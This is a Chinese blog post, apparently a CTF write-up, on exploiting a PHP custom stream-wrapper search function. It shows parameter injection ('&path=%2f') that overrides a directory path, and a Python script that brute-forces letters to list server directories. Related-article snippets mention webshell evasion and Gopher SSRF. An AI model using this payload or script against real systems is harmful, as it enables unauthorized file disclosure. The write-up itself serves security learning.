php自定义通讯协议,PHP自定义协议攻击 by L0st

最新推荐文章于 2023-07-16 16:52:15 发布
最新推荐文章于 2023-07-16 16:52:15 发布
阅读量122 收藏
点赞数

PHP 安全漏洞 路径遍历 ASCII遍历 输入验证
关键词由CSDN通过智能技术生成

经过前辈提示,入口果然还是在search页面,那个include()和master类

search语句

if(isset($_POST['name']))

{

$userpath=$results['userpath'];

$userpath='uploads%2f'.$userpath.'%2f';

$master='master://search/path='.$userpath.'&name='.$_POST['name'];

//var_dump($master);

include $master;

}

master类中的search函数

function search($path,$name)

{

if(!is_dir($path))

{

echo 'illegal!';

return 1;

}

$files=scandir($path);

echo '';

foreach($files as $k=>$v)

{

if(str_ireplace($name,'',$v)!==$v)

{

echo $v.'';

}

}

return 1;

}

整个流程是用户注册时会随机生成

math?formula=userpath%E4%BD%9C%E4%B8%BA%E4%BF%9D%E5%AD%98%E7%94%A8%E6%88%B7%E6%96%87%E4%BB%B6%E7%9A%84%E5%9C%B0%E6%96%B9%EF%BC%8C%E5%81%9Asearch%E5%91%BD%E4%BB%A4%E6%97%B6%E4%BC%9A%E8%87%AA%E5%8A%A8%E5%B0%86%24userpath%E5%92%8C%E6%8E%A5%E6%94%B6%E5%88%B0%E7%9A%84name拼接在一起:

$master='master://search/path='.$userpath.'&name='.$_POST['name']

//调用master类协议中的search函数,提交两个参数path和name,且使用&进行连接

考虑在name后再拼接一个path变量,覆盖之前的path,通过代码可以看到对于name和path没有过滤,只是规定了path变量必须为目录。

造轮子:

关键字&path=%2f //关键字可以从[a-z]依次遍历,path设置为%2f会访问www服务文件夹所在目录

达到的结果就是越权遍历目录

写了个脚本来实现遍历:

import requests

from bs4 import BeautifulSoup

url = "http://xxxxxxxx:56000/search.php"

#letter_list = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k',

# 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',

# 'w', 'x', 'y', 'z']

dir = []

post = {}

test = requests.get(url)

if test.status_code == 200:

print("Connection Succeed!\n")

print("*******************\n")

else:

print("Fail!!!\n")

for i in range(65,91):

post["name"] = chr(i) + "&path=%2f"

cookie = {

"PHPSESSID":"xxxxxxxxxxxxxxxxx"

}

r = requests.post(url,data=post,cookies=cookie)

soup = BeautifulSoup(r.text,features="html.parser")

print(soup.prettify())

print("-------------")

print("Done.")

weixin_39646021
关注
PHP WebShell 免杀
悦分享
08-01 6037
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
PHP7.2.12 编译安装
huayan0603的专栏
11-30 1142
  1.下载软件 进入http://php.net/get/php-7.2.12.tar.gz/from/a/mirror选择相应的镜像地址下载相应的版本 2.安装必要的依赖 yum install libxml2 libxml2-devel openssl openssl-devel libcurl libcurl-devel libjpeg libjpeg-devel libpng ...
php自定义通讯协议,如何实现自定义协议
weixin_36391538的博客
03-25 289
一个能够解析和封装hqts协议的客户端;一个能够解析hqts且能够对hqts协议的某个字段的sddsdd/assdsdsds/sddsdsds.html进行解析(包括转发)的服务器。可以拿http举例,你要实现的是一个类似于http的协议。那么你可以基于tcp实现。也就是说,你可以设计一个hqts协议:htqs:active: xxxxuri: yyyybody: zz...
php自定义通讯协议,通过PHP自定义协议实现把字符串代码变为可以执行代码
weixin_39775354的博客
03-10 154
以crossphp中解析注释配置为例,定义协议名:annotate $str_code = array(foo=bar); stream_register_wrapper(annotate,stringToPHPStream); $var=include(annotate://{$str_code}); print_r($var); 这样字符串$str_code就变成了一个php的array,远离...
php 通讯协议开发,定制通讯协议
weixin_35798118的博客
03-11 130
如何定制协议实际上制定自己的协议是比较简单的事情。简单的协议一般包含两部分:区分数据边界的标识数据格式定义一个例子协议定义这里假设区分数据边界的标识为换行符"\n"(注意请求数据本身内部不能包含换行符),数据格式为Json,例如下面是一个符合这个规则的请求包。{"type":"message","content":"hello"}注意上面的请求数据末尾有一个换行字符(在PHP中用双引号字符串"\n...
php如何编写通信协议,定制通讯协议
weixin_39640024的博客
03-16 292
## 如何定制协议实际上制定自己的协议是比较简单的事情。简单的协议一般包含两部分:* 区分数据边界的标识* 数据格式定义## 一个例子### 协议定义这里假设区分数据边界的标识为换行符"\n"(注意请求数据本身内部不能包含换行符),数据格式为Json,例如下面是一个符合这个规则的请求包。{"type":"message","content":"hello"}注意上面的请求数据末尾有一个换行字符(在...
php 通讯协议,通讯协议作用
weixin_29577845的博客
03-13 224
通讯协议的作用由于TCP是基于流的,客户端发送的请求数据是像水流一样流入到服务端,服务端探测到有数据到来后应该检查数据是否是完整的,因为可能只是一个请求的部分数据到达服务端,甚至可能是多个请求连在一起到达服务端。如何判断请求是否全部到达或者从多个连在一起的请求中分离请求,就需要规定一套通讯协议。在WorkerMan中为什么要制定协议?传统PHP开发都是基于Web的,基本上都是HTTP协议,HTTP...
CentOS7 PHP 安装
Mr-KKO
05-31 1387
PHP 安装 源码编译安装 获取源码 从官网的下载页面下载对应的源码。 从GitHub上下载PHP的源码,地址为 https://github.com/php/php-src # GitHub上的源码可通过 clone 选择一个要安装的版本并下载到本地计算机 [root@instance-36dg06w0 php-7.3.5]# git clone -b PHP-7.3.5 https://g...
Jstree树形控件实现树形结构展示+自定义节点图标
热门推荐
Cmexico的专栏
12-25 1万+
因项目中用到树形展示数据功能,所以决定使用Jstree(jstree_pre1.0_fix_1)辅助前端展示,使用过程中,大部分参考官方doc和demo实现,由于需要自定义节点图片,起初着实纠结了很久,不过后来无意中看到网上一篇asp的帖子,构建方法,便摸索着修改了些源码,实现了自定义节点图标(下面会贴出相关代码).由于对此控件没有深入研究,所以有理解有误或者使用有误的地方,还请各位指教。 后台
PostgreSQL中使用数组改进性能实例代码
12-16
与许多编程语言不同,PostgreSQL数组的索引从1开始,而不是0。例如,第一个元素的索引是1,第二个元素是2,以此类推。 3. **指定长度**: 数组可以指定固定长度,也可以不指定长度,让系统自动扩展以适应数据需求...
http向tcp通信php,常见通信协议HTTP、TCP、UDP的简单介绍
weixin_36459720的博客
03-21 210
TCP HTTP UDP:都是通信协议,也就是通信时所遵守的规则,只有双方按照这个规则“说话”,对方才能理解或为之服务。TCP HTTP UDP三者的关系:TCP/IP是个协议组,可分为四个层次:网络接口层、网络层、传输层和应用层。在网络层有IP协议、ICMP协议、ARP协议、RARP协议和BOOTP协议。在传输层中有TCP协议与UDP协议。在应用层有FTP、HTTP、TELNET...
关于php在通信协议中的使用研究
oChouYaoFanDe的博客
07-06 609
今天在使用php进行FMTCP通信的时候发现发送的数据是浮点数的16进制byte序列 因此发布两个函数 以防忘记 /** * 16进制字符串转浮点数 */ private function hexToFloat32($strHex) { $binarydata32 = pack('H*',$strHex); $float32 = unpack("f", $binarydata3
php是走什么协议,php不支持哪个网络协议
weixin_32520601的博客
03-10 190
php不支持哪个网络协议呢?我相信大家对这个问题可能都不是很了解。但是佰佰安全网为了帮助我们回答这个问题。它在自己的网站上发布了与之有关的佰佰安全网吧。PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize()的文件系统函数。 除了这些封装协议,还能通过 stream_wrapper_register() 来注册...
php攻击
xiaonanhaijing的博客
02-11 3410
SYN攻击 SYN攻击属于DOS攻击的一种,它利用TCP协议缺陷, 通过发送大量的半连接请求,耗费CPU和内存资源。 SYN攻击 除了能影响主机外,还可以危害路由器、 防火墙等网络系统,事实上SYN攻击并不管目标是什么系统, 只要这些系统 打开TCP服务就可以实施 ...
常见的php攻击(6种攻击详解)
JoeyBlog
12-02 9197
1、SQL注入 SQL注入是一种恶意攻击,用户利用在表单字段输入SQL语句的方式来影响正常的SQL执行。还有一种是通过system()或exec()命令注入的,它具有相同的SQL注入机制,但只针对shell命令。 [python] view plain copy $username = $_POST['username'];  $query = "sele
PHP渗透技巧拓展】————2、利用 Gopher 协议拓展攻击
Fly_鹏程万里
01-31 2153
1 概述 Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议。当然现在 Gopher 协议已经慢慢淡出历史。 Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。 2 攻击面测...
实用PHP编程技巧:掌握HTTP通信和文件处理的小白指南
最新发布
qq_68163788的博客
07-16 2201
PHP的文件编程能力包括基本的文件操作函数,如文件打开、读取、写入和关闭等。此外,还提供了目录操作函数,使得开发者可以轻松地遍历目录、创建目录和删除目录。通过适当的文件权限控制,开发者可以确保文件系统的安全性。 另一方面,PHP在HTTP通信方面表现出色。HTTP是一种应用层协议,用于在客户端和服务器之间传输数据。在PHP中,可以通过内置的HTTP相关函数进行HTTP请求和响应的处理。开发者可以发送GET或POST请求,并获取远程服务器返回的响应数据。这使得PHP能够实现与其他Web服务进行数据交互
抓包分析php一句话木马
LainWith的博客
08-27 3133
在回答一句话木马是怎么玩的之前,先从最简单的_GET开始 _GET(PHP数组) _GET是一个数组 _GET的作用域是超全局,不需在脚本内部定义或初始化,即可使用 接收从浏览器客户端GET方式(URL中)传递到服务器的参数 GET传参的参数名做_GET数组的key,参数值做为数组的value GET传参时,直接将参数拼接到URL中即可 举个例子来说明_GET是怎么玩的 <pre> #标准化输出 <?php $name="alice"; #初始化一个变量 echo "Your nam
自定义PHP模板引擎:分离视图与逻辑
自定义PHP模板引擎是一种用于Web开发的工具,它基于MVC(Model-View-Controller)设计模式,旨在提升代码结构清晰度和维护性。在PHP项目中,模板引擎的主要作用是分离视图层(HTML)与业务逻辑(PHP)和数据处理,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值